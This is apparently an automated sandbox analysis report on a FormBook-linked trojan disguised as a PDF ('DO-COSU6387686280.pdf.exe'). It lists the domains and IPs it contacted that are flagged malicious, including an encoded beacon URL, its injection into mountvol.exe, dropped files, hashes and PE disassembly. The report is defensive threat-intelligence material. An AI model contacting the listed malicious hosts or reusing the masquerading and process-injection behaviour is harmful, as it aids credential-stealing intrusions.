                                                      http://www.bioland.app/0322/?YvA4=xnL8AvI8CJiPEDU&UbRxm=HxR1FeZHXJ7BSqCS3fD8mQxxaJumBZenc9dO7nNnWiW1TdG8ymlkgtRZzCsH8EsCxrgxn7fyxa4U+0BCWK8lvrgV1wD4C6X04kpiBTwqtuBdGQan/Ge0WLc1tZ3QEOC6mw==true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.oztalkshw.storeEnLuReulIds.exe, 00000007.00000002.3916754998.000000000511C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/chrome_newtabmountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://lolipop.jp/mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://pepabo.com/mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.reg.ru/support/#requestmountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.commountvol.exe, 00000006.00000002.3914892156.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000431C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://files.reg.ru/fonts/inter/Inter-Regular.woff)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refermountvol.exe, 00000006.00000002.3914892156.0000000004BD8000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003FF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.lolipop.jp/hc/ja/articles/360049132953mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://kb.fastpanel.direct/troubleshoot/mountvol.exe, 00000006.00000002.3917281058.0000000006010000.00000004.00000800.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3914892156.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003E66000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://files.reg.ru/fonts/inter/Inter-Medium.woff2)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://2domains.rumountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gifmountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.ecosia.org/newtab/mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://files.reg.ru/fonts/inter/Inter-Regular.woff2)mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://js.ad-stir.com/js/adstir.js?20130527mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://server118.hosting.reg.ru/managerEnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://static.minne.com/files/banner/minne_600x500mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://reg.ru?target=_blankmountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      37.140.192.206
                                                                                      		www.iner-tech.onlineRussian Federation
                                                                                      		197695AS-REGRUtrue
                                                                                      209.74.77.109
                                                                                      		www.futuru.xyzUnited States
                                                                                      		31744MULTIBAND-NEWHOPEUStrue
                                                                                      13.248.169.48
                                                                                      		www.krshop.shopUnited States
                                                                                      		16509AMAZON-02UStrue
                                                                                      172.67.129.38
                                                                                      		www.kkpmoneysocial.topUnited States
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      163.44.185.183
                                                                                      		www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPtrue
                                                                                      199.59.243.227
                                                                                      		www.oztalkshw.storeUnited States
                                                                                      		395082BODIS-NJUStrue
                                                                                      84.32.84.32
                                                                                      		samundri.onlineLithuania
                                                                                      		33922NTT-LT-ASLTtrue
                                                                                      202.61.233.66
                                                                                      		www.bioland.appAustralia
                                                                                      		4842TH-AS-APTianhaiInfoTechCNtrue
                                                                                      195.110.124.133
                                                                                      		officinadelpasso.shopItaly
                                                                                      		39729REGISTER-ASITtrue
                                                                                      118.107.250.103
                                                                                      		www.zxyck.netHong Kong
                                                                                      		24321OCENET-AS-APOCESdnBhdISPMYtrue
                                                                                      104.21.24.198
                                                                                      		www.supernutra01.onlineUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      38.181.21.85
                                                                                      		www.yhj12.oneUnited States
                                                                                      		174COGENT-174UStrue
                                                                                      66.29.137.10
                                                                                      		callyur.shopUnited States
                                                                                      		19538ADVANTAGECOMUStrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1562315
                                                                                      Start date and time:2024-11-25 13:54:03 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 43s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:11
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:DO-COSU6387686280.pdf.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@15/13
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 90%
                                                                                      • Number of executed functions: 96
                                                                                      • Number of non-executed functions: 319
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: DO-COSU6387686280.pdf.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      07:54:58API Interceptor1x Sleep call for process: DO-COSU6387686280.pdf.exe modified
                                                                                      07:56:09API Interceptor9629657x Sleep call for process: mountvol.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      209.74.77.109PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.greenthub.life/r3zg/
                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.moviebuff.info/4r26/
                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gogawithme.live/6gtt/
                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gogawithme.live/6gtt/
                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gogawithme.live/6gtt/
                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.dailyfuns.info/n9b0/
                                                                                      13.248.169.48Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.a1shop.shop/5cnx/
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • www.tals.xyz/tj5o/
                                                                                      santi.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.lirio.shop/qp0h/
                                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.optimismbank.xyz/98j3/
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/cpgr/
                                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/cpgr/
                                                                                      Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/stx5/
                                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/k1td/
                                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.zxyck.netA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • 118.107.250.103
                                                                                      www.sankan-fukushi.infoIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 163.44.185.183
                                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 163.44.185.183
                                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                      • 163.44.185.183
                                                                                      www.supernutra01.onlineCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36
                                                                                      Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36
                                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSNew Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 172.67.74.152
                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 172.67.177.134
                                                                                      packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.49.253
                                                                                      #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 172.67.200.96
                                                                                      F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 172.67.177.134
                                                                                      https://go.jrwcap.com/e/955053/230645595232154/6xyvj/710994189/h/-dwcgo8Jrn520ILsDDgocWZSKLzmmTijUb6c_giV2KAGet hashmaliciousPhisherBrowse
                                                                                      • 104.22.72.81
                                                                                      dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.88.250
                                                                                      AMAZON-02USFi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      https://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                      • 108.158.75.127
                                                                                      Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 63.32.197.17
                                                                                      https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.227.8.25
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 13.248.169.48
                                                                                      http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                      • 35.158.4.76
                                                                                      http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                                                      • 54.230.112.122
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 108.139.47.50
                                                                                      XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 13.228.81.39
                                                                                      MULTIBAND-NEWHOPEUSpacking list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.64.59
                                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 209.74.77.108
                                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.108
                                                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.108
                                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.107
                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      AS-REGRUFi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                      • 31.31.196.177
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 31.31.196.177
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.58.112.174
                                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                      • 31.31.196.177
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.58.112.174
                                                                                      Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                                      • 31.31.196.17
                                                                                      HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                                      • 31.31.198.145
                                                                                      Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                                      • 194.58.112.173
                                                                                      F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      • 195.133.18.88
                                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                      • 31.31.196.17

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DO-COSU6387686280.pdf.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                      C:\Users\user\AppData\Local\Temp\p1h163LmP

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\mountvol.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1209886597424439
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.984585804952206
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:DO-COSU6387686280.pdf.exe
                                                                                      File size:779'776 bytes
                                                                                      MD5:ad0da4a07f4866d67b266c8686f76081
                                                                                      SHA1:894f87c4af3b773215fdfec30606db22d179b7e8
                                                                                      SHA256:1cd3d14faf26873468674af56f8057334ac672b1579a538764ef87fc107deb52
                                                                                      SHA512:4eb35d8a438446a363af44361164ba015bacdcf880b8846e6548ad91bc9f70a3b5ee56284d9e49a21edba42e0c85214136a4c7cbfed78132341da686864345ea
                                                                                      SSDEEP:12288:cbeXOimkDgekao2HFQlVNwou+Wo1ZfAQKHXMhdkxI2YhkWOb1mDVFOemOK:SeXJ9DDkaPH6nNwv+Wa0M/hBObAvVK
                                                                                      TLSH:75F423657984C3AEC2BD2AF2E44916494333D33F1313DB4DADCA57983AF43AE54607A2
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Cg..............0.............*.... ........@.. .......................@............@................................

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4bfd2a
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6743DCD2 [Mon Nov 25 02:11:30 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
